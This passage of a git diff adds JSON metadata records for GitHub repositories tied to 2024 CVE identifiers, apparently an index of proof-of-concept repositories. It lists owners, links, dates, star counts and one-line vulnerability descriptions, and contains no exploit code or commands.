"pushed_at": "2024-11-13T07:51:37Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-50964", + "cves" + ], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50968.json b/2024/CVE-2024-50968.json new file mode 100644 index 0000000000..c6e129426f --- /dev/null +++ b/2024/CVE-2024-50968.json @@ -0,0 +1,33 @@ +[ + { + "id": 887259811, + "name": "CVE-2024-50968", + "full_name": "Akhlak2511\/CVE-2024-50968", + "owner": { + "login": "Akhlak2511", + "id": 74315191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74315191?v=4", + "html_url": "https:\/\/github.com\/Akhlak2511", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akhlak2511\/CVE-2024-50968", + "description": null, + "fork": false, + "created_at": "2024-11-12T12:48:17Z", + "updated_at": "2024-11-12T13:02:03Z", + "pushed_at": "2024-11-12T13:01:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50969.json b/2024/CVE-2024-50969.json new file mode 100644 index 0000000000..23f84d1717 --- /dev/null +++ b/2024/CVE-2024-50969.json @@ -0,0 +1,33 @@ +[ + { + "id": 887401537, + "name": "CVE-2024-50969", + "full_name": "Akhlak2511\/CVE-2024-50969", + "owner": { + "login": "Akhlak2511", + "id": 74315191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74315191?v=4", + "html_url": "https:\/\/github.com\/Akhlak2511", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akhlak2511\/CVE-2024-50969", + "description": null, + "fork": false, + "created_at": "2024-11-12T17:20:07Z", + "updated_at": "2024-11-12T17:28:23Z", + "pushed_at": "2024-11-12T17:28:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50970.json b/2024/CVE-2024-50970.json new file mode 100644 index 0000000000..a2285a69db --- /dev/null +++ b/2024/CVE-2024-50970.json @@ -0,0 +1,33 @@ +[ + { + "id": 887406221, + "name": "CVE-2024-50970", + "full_name": "Akhlak2511\/CVE-2024-50970", + "owner": { + "login": "Akhlak2511", + "id": 74315191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74315191?v=4", + "html_url": "https:\/\/github.com\/Akhlak2511", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akhlak2511\/CVE-2024-50970", + "description": null, + "fork": false, + "created_at": "2024-11-12T17:30:00Z", + "updated_at": "2024-11-12T17:34:01Z", + "pushed_at": "2024-11-12T17:33:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50971.json b/2024/CVE-2024-50971.json new file mode 100644 index 0000000000..f883ca637a --- /dev/null +++ b/2024/CVE-2024-50971.json @@ -0,0 +1,33 @@ +[ + { + "id": 887409068, + "name": "CVE-2024-50971", + "full_name": "Akhlak2511\/CVE-2024-50971", + "owner": { + "login": "Akhlak2511", + "id": 74315191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74315191?v=4", + "html_url": "https:\/\/github.com\/Akhlak2511", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akhlak2511\/CVE-2024-50971", + "description": null, + "fork": false, + "created_at": "2024-11-12T17:36:02Z", + "updated_at": "2024-11-12T17:39:26Z", + "pushed_at": "2024-11-12T17:39:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50972.json b/2024/CVE-2024-50972.json new file mode 100644 index 0000000000..3ff74b2863 --- /dev/null +++ b/2024/CVE-2024-50972.json @@ -0,0 +1,33 @@ +[ + { + "id": 887411310, + "name": "CVE-2024-50972", + "full_name": "Akhlak2511\/CVE-2024-50972", + "owner": { + "login": "Akhlak2511", + "id": 74315191, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74315191?v=4", + "html_url": "https:\/\/github.com\/Akhlak2511", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Akhlak2511\/CVE-2024-50972", + "description": null, + "fork": false, + "created_at": "2024-11-12T17:40:54Z", + "updated_at": "2024-11-12T17:43:51Z", + "pushed_at": "2024-11-12T17:43:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-50986.json b/2024/CVE-2024-50986.json new file mode 100644 index 0000000000..7a06d8b66c --- /dev/null +++ b/2024/CVE-2024-50986.json @@ -0,0 +1,33 @@ +[ + { + "id": 887656070, + "name": "CVE-2024-50986", + "full_name": "riftsandroses\/CVE-2024-50986", + "owner": { + "login": "riftsandroses", + "id": 63180210, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63180210?v=4", + "html_url": "https:\/\/github.com\/riftsandroses", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/riftsandroses\/CVE-2024-50986", + "description": "An issue in Clementine v.1.3.1 allows a local attacker to execute arbitrary code via a crafted DLL file (DLL Hijacking)", + "fork": false, + "created_at": "2024-11-13T03:49:07Z", + "updated_at": "2024-12-29T20:00:31Z", + "pushed_at": "2024-12-29T20:00:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51026.json b/2024/CVE-2024-51026.json new file mode 100644 index 0000000000..641a48d004 --- /dev/null +++ b/2024/CVE-2024-51026.json @@ -0,0 +1,33 @@ +[ + { + "id": 886757040, + "name": "CVE-2024-51026_Overview", + "full_name": "BrotherOfJhonny\/CVE-2024-51026_Overview", + "owner": { + "login": "BrotherOfJhonny", + "id": 28454566, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28454566?v=4", + "html_url": "https:\/\/github.com\/BrotherOfJhonny", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BrotherOfJhonny\/CVE-2024-51026_Overview", + "description": "Sistema NetAdmin IAM 4 é vulnerável a Cross Site Scripting (XSS), no endpoint \/BalloonSave.ashx", + "fork": false, + "created_at": "2024-11-11T14:49:47Z", + "updated_at": "2024-11-11T14:58:58Z", + "pushed_at": "2024-11-11T14:58:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51030.json b/2024/CVE-2024-51030.json new file mode 100644 index 0000000000..d265066d98 --- /dev/null +++ b/2024/CVE-2024-51030.json @@ -0,0 +1,33 @@ +[ + { + "id": 883929203, + "name": "CVE-2024-51030", + "full_name": "vighneshnair7\/CVE-2024-51030", + "owner": { + "login": "vighneshnair7", + "id": 186159201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/186159201?v=4", + "html_url": "https:\/\/github.com\/vighneshnair7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vighneshnair7\/CVE-2024-51030", + "description": null, + "fork": false, + "created_at": "2024-11-05T20:33:56Z", + "updated_at": "2024-11-05T20:45:23Z", + "pushed_at": "2024-11-05T20:45:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51031.json b/2024/CVE-2024-51031.json new file mode 100644 index 0000000000..950a07cbae --- /dev/null +++ b/2024/CVE-2024-51031.json @@ -0,0 +1,33 @@ +[ + { + "id": 883938105, + "name": "CVE-2024-51031", + "full_name": "vighneshnair7\/CVE-2024-51031", + "owner": { + "login": "vighneshnair7", + "id": 186159201, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/186159201?v=4", + "html_url": "https:\/\/github.com\/vighneshnair7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vighneshnair7\/CVE-2024-51031", + "description": null, + "fork": false, + "created_at": "2024-11-05T20:59:14Z", + "updated_at": "2024-11-05T21:04:48Z", + "pushed_at": "2024-11-05T21:04:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51032.json b/2024/CVE-2024-51032.json new file mode 100644 index 0000000000..b48e614525 --- /dev/null +++ b/2024/CVE-2024-51032.json @@ -0,0 +1,33 @@ +[ + { + "id": 883932000, + "name": "CVE-2024-51032", + "full_name": "Shree-Chandragiri\/CVE-2024-51032", + "owner": { + "login": "Shree-Chandragiri", + "id": 187441471, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/187441471?v=4", + "html_url": "https:\/\/github.com\/Shree-Chandragiri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Shree-Chandragiri\/CVE-2024-51032", + "description": "A Cross-site Scripting (XSS) vulnerability in manage_recipient.php of Sourcecodester Toll Tax Management System 1.0 allows remote authenticated users to inject arbitrary web scripts via the \"owner\" input field.", + "fork": false, + "created_at": "2024-11-05T20:41:15Z", + "updated_at": "2024-11-05T21:04:24Z", + "pushed_at": "2024-11-05T21:04:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51132.json b/2024/CVE-2024-51132.json new file mode 100644 index 0000000000..ff8ca690ed --- /dev/null +++ b/2024/CVE-2024-51132.json @@ -0,0 +1,33 @@ +[ + { + "id": 882327865, + "name": "CVE-2024-51132-POC", + "full_name": "JAckLosingHeart\/CVE-2024-51132-POC", + "owner": { + "login": "JAckLosingHeart", + "id": 57932150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57932150?v=4", + "html_url": "https:\/\/github.com\/JAckLosingHeart", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JAckLosingHeart\/CVE-2024-51132-POC", + "description": null, + "fork": false, + "created_at": "2024-11-02T14:30:29Z", + "updated_at": "2024-11-21T07:42:10Z", + "pushed_at": "2024-11-09T07:58:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51179.json b/2024/CVE-2024-51179.json new file mode 100644 index 0000000000..a44c0ca66d --- /dev/null +++ b/2024/CVE-2024-51179.json @@ -0,0 +1,33 @@ +[ + { + "id": 885336150, + "name": "CVE-2024-51179", + "full_name": "Lakshmirnr\/CVE-2024-51179", + "owner": { + "login": "Lakshmirnr", + "id": 172017730, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172017730?v=4", + "html_url": "https:\/\/github.com\/Lakshmirnr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lakshmirnr\/CVE-2024-51179", + "description": null, + "fork": false, + "created_at": "2024-11-08T11:47:07Z", + "updated_at": "2024-12-13T20:55:01Z", + "pushed_at": "2024-11-08T18:42:51Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-5124.json b/2024/CVE-2024-5124.json new file mode 100644 index 0000000000..31ce80b98a --- /dev/null +++ b/2024/CVE-2024-5124.json @@ -0,0 +1,64 @@ +[ + { + "id": 880757168, + "name": "CVE-2024-5124", + "full_name": "gogo2464\/CVE-2024-5124", + "owner": { + "login": "gogo2464", + "id": 57051187, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57051187?v=4", + "html_url": "https:\/\/github.com\/gogo2464", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gogo2464\/CVE-2024-5124", + "description": null, + "fork": false, + "created_at": "2024-10-30T09:53:42Z", + "updated_at": "2024-12-03T13:29:27Z", + "pushed_at": "2024-11-03T11:49:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 897673934, + "name": "cve-2024-5124-poc", + "full_name": "XiaomingX\/cve-2024-5124-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-5124-poc", + "description": "CVE-2024-5124 poc", + "fork": false, + "created_at": "2024-12-03T03:18:48Z", + "updated_at": "2025-01-07T18:27:40Z", + "pushed_at": "2024-12-03T04:01:32Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51358.json b/2024/CVE-2024-51358.json new file mode 100644 index 0000000000..34cd969ea3 --- /dev/null +++ b/2024/CVE-2024-51358.json @@ -0,0 +1,33 @@ +[ + { + "id": 882335500, + "name": "CVE-2024-51358", + "full_name": "Kov404\/CVE-2024-51358", + "owner": { + "login": "Kov404", + "id": 177751667, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/177751667?v=4", + "html_url": "https:\/\/github.com\/Kov404", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Kov404\/CVE-2024-51358", + "description": null, + "fork": false, + "created_at": "2024-11-02T14:55:00Z", + "updated_at": "2024-11-02T14:56:08Z", + "pushed_at": "2024-11-02T14:56:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51378.json b/2024/CVE-2024-51378.json new file mode 100644 index 0000000000..22aef9fa5a --- /dev/null +++ b/2024/CVE-2024-51378.json @@ -0,0 +1,64 @@ +[ + { + "id": 880552224, + "name": "CVE-2024-51378", + "full_name": "refr4g\/CVE-2024-51378", + "owner": { + "login": "refr4g", + "id": 63981656, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63981656?v=4", + "html_url": "https:\/\/github.com\/refr4g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/refr4g\/CVE-2024-51378", + "description": "Exploit for CyberPanel Pre-Auth RCE via Command Injection", + "fork": false, + "created_at": "2024-10-29T23:34:27Z", + "updated_at": "2024-12-30T05:43:33Z", + "pushed_at": "2024-11-01T10:12:49Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 911522017, + "name": "CVE-2024-51378", + "full_name": "i0x29A\/CVE-2024-51378", + "owner": { + "login": "i0x29A", + "id": 155425848, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/155425848?v=4", + "html_url": "https:\/\/github.com\/i0x29A", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/i0x29A\/CVE-2024-51378", + "description": "A Python script to scan websites for the CVE-2024-51378 vulnerability.", + "fork": false, + "created_at": "2025-01-03T08:05:07Z", + "updated_at": "2025-01-03T08:13:38Z", + "pushed_at": "2025-01-03T08:13:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51430.json b/2024/CVE-2024-51430.json new file mode 100644 index 0000000000..0809ffea41 --- /dev/null +++ b/2024/CVE-2024-51430.json @@ -0,0 +1,33 @@ +[ + { + "id": 880470583, + "name": "CVE-2024-51430", + "full_name": "BLACK-SCORP10\/CVE-2024-51430", + "owner": { + "login": "BLACK-SCORP10", + "id": 102329978, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102329978?v=4", + "html_url": "https:\/\/github.com\/BLACK-SCORP10", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BLACK-SCORP10\/CVE-2024-51430", + "description": "The Online Diagnostic Lab Management System has a security problem called Cross-Site Scripting (XSS) in the Borrower section.", + "fork": false, + "created_at": "2024-10-29T19:32:05Z", + "updated_at": "2024-11-21T09:14:45Z", + "pushed_at": "2024-10-29T19:40:06Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51435.json b/2024/CVE-2024-51435.json new file mode 100644 index 0000000000..584d208924 --- /dev/null +++ b/2024/CVE-2024-51435.json @@ -0,0 +1,33 @@ +[ + { + "id": 878714460, + "name": "CVE-2024-51435", + "full_name": "bevennyamande\/CVE-2024-51435", + "owner": { + "login": "bevennyamande", + "id": 10162710, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10162710?v=4", + "html_url": "https:\/\/github.com\/bevennyamande", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bevennyamande\/CVE-2024-51435", + "description": "bloodbank POCs", + "fork": false, + "created_at": "2024-10-25T23:28:09Z", + "updated_at": "2024-10-28T18:47:29Z", + "pushed_at": "2024-10-25T23:50:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51442.json b/2024/CVE-2024-51442.json new file mode 100644 index 0000000000..b54249a61d --- /dev/null +++ b/2024/CVE-2024-51442.json @@ -0,0 +1,33 @@ +[ + { + "id": 910603659, + "name": "CVE-2024-51442", + "full_name": "mselbrede\/CVE-2024-51442", + "owner": { + "login": "mselbrede", + "id": 43323139, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43323139?v=4", + "html_url": "https:\/\/github.com\/mselbrede", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mselbrede\/CVE-2024-51442", + "description": "CVE-2024-51442 write up and example config file", + "fork": false, + "created_at": "2024-12-31T19:27:36Z", + "updated_at": "2024-12-31T19:33:28Z", + "pushed_at": "2024-12-31T19:33:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51567.json b/2024/CVE-2024-51567.json new file mode 100644 index 0000000000..32bf9b985f --- /dev/null +++ b/2024/CVE-2024-51567.json @@ -0,0 +1,98 @@ +[ + { + "id": 881591080, + "name": "CVE-2024-51567", + "full_name": "ajayalf\/CVE-2024-51567", + "owner": { + "login": "ajayalf", + "id": 49350537, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49350537?v=4", + "html_url": "https:\/\/github.com\/ajayalf", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ajayalf\/CVE-2024-51567", + "description": "CVE-2024-51567 is a Python PoC exploit targeting an RCE vulnerability in CyberPanel v2.3.6’s upgrademysqlstatus endpoint, bypassing CSRF protections.", + "fork": false, + "created_at": "2024-10-31T21:55:57Z", + "updated_at": "2025-01-05T16:12:36Z", + "pushed_at": "2024-11-01T10:48:42Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-51567", + "cyberpanel" + ], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 884847468, + "name": "CVE-2024-51567-RCE-EXPLOIT", + "full_name": "thehash007\/CVE-2024-51567-RCE-EXPLOIT", + "owner": { + "login": "thehash007", + "id": 108442682, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108442682?v=4", + "html_url": "https:\/\/github.com\/thehash007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thehash007\/CVE-2024-51567-RCE-EXPLOIT", + "description": "cbyerpanel rce exploit", + "fork": false, + "created_at": "2024-11-07T13:52:37Z", + "updated_at": "2024-12-28T21:06:32Z", + "pushed_at": "2024-11-07T13:57:25Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 894240840, + "name": "cve-2024-51567-poc", + "full_name": "XiaomingX\/cve-2024-51567-poc", + "owner": { + "login": "XiaomingX", + "id": 5387930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5387930?v=4", + "html_url": "https:\/\/github.com\/XiaomingX", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/XiaomingX\/cve-2024-51567-poc", + "description": "CVE-2024-51567 is a Python PoC exploit targeting an RCE vulnerability in CyberPanel v2.3.6’s upgrademysqlstatus endpoint, bypassing CSRF protections.", + "fork": false, + "created_at": "2024-11-26T02:18:24Z", + "updated_at": "2024-12-08T18:32:12Z", + "pushed_at": "2024-11-26T02:21:21Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51665.json b/2024/CVE-2024-51665.json new file mode 100644 index 0000000000..7b37f57011 --- /dev/null +++ b/2024/CVE-2024-51665.json @@ -0,0 +1,33 @@ +[ + { + "id": 886174697, + "name": "CVE-2024-51665", + "full_name": "RandomRobbieBF\/CVE-2024-51665", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-51665", + "description": "Magical Addons For Elementor <= 1.2.1 - Authenticated (Subscriber+) Server-Side Request Forgery", + "fork": false, + "created_at": "2024-11-10T12:01:52Z", + "updated_at": "2024-11-15T13:23:56Z", + "pushed_at": "2024-11-10T12:02:45Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-51747.json b/2024/CVE-2024-51747.json new file mode 100644 index 0000000000..c62dad4c9e --- /dev/null +++ b/2024/CVE-2024-51747.json @@ -0,0 +1,33 @@ +[ + { + "id": 888811330, + "name": "CVE-2024-51747", + "full_name": "l20170217b\/CVE-2024-51747", + "owner": { + "login": "l20170217b", + "id": 153576205, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153576205?v=4", + "html_url": "https:\/\/github.com\/l20170217b", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/l20170217b\/CVE-2024-51747", + "description": null, + "fork": false, + "created_at": "2024-11-15T03:40:49Z", + "updated_at": "2024-11-18T12:40:30Z", + "pushed_at": "2024-11-15T04:00:38Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52002.json b/2024/CVE-2024-52002.json new file mode 100644 index 0000000000..d9e22c7de0 --- /dev/null +++ b/2024/CVE-2024-52002.json @@ -0,0 +1,33 @@ +[ + { + "id": 907531691, + "name": "iTop-CVEs-exploit", + "full_name": "Harshit-Mashru\/iTop-CVEs-exploit", + "owner": { + "login": "Harshit-Mashru", + "id": 31271975, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31271975?v=4", + "html_url": "https:\/\/github.com\/Harshit-Mashru", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Harshit-Mashru\/iTop-CVEs-exploit", + "description": "This repository contains exploits for iTOP CVE-2024-52002, 52000, 31998, 31448 that involve CSRF+XSS chaining to get RCE", + "fork": false, + "created_at": "2024-12-23T19:56:56Z", + "updated_at": "2024-12-30T00:27:36Z", + "pushed_at": "2024-12-30T00:27:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-52301.json b/2024/CVE-2024-52301.json new file mode 100644 index 0000000000..2adc5700ca --- /dev/null +++ b/2024/CVE-2024-52301.json @@ -0,0 +1,95 @@ +[ + { + "id": 888639868, + "name": "CVE-2024-52301", + "full_name": "Nyamort\/CVE-2024-52301", + "owner": { + "login": "Nyamort", + "id": 67233336, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67233336?v=4", + "html_url": "https:\/\/github.com\/Nyamort", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Nyamort\/CVE-2024-52301", + "description": null, + "fork": false, + "created_at": "2024-11-14T18:41:31Z", + "updated_at": "2024-11-18T10:25:29Z", + "pushed_at": "2024-11-14T19:27:31Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889180658, + "name": "CVE-2024-52301-Research", + "full_name": "martinhaunschmid\/CVE-2024-52301-Research", + "owner": { + "login": "martinhaunschmid", + "id": 35374703, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35374703?v=4", + "html_url": "https:\/\/github.com\/martinhaunschmid", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/martinhaunschmid\/CVE-2024-52301-Research", + "description": "A bit of research around CVE-2024-52301", + "fork": false, + "created_at": "2024-11-15T19:11:35Z", + "updated_at": "2024-11-15T19:42:15Z", + "pushed_at": "2024-11-15T19:42:11Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 896329974, + "name": "CVE-2024-52301", + "full_name": "nanwinata\/CVE-2024-52301", + "owner": { + "login": "nanwinata", + "id": 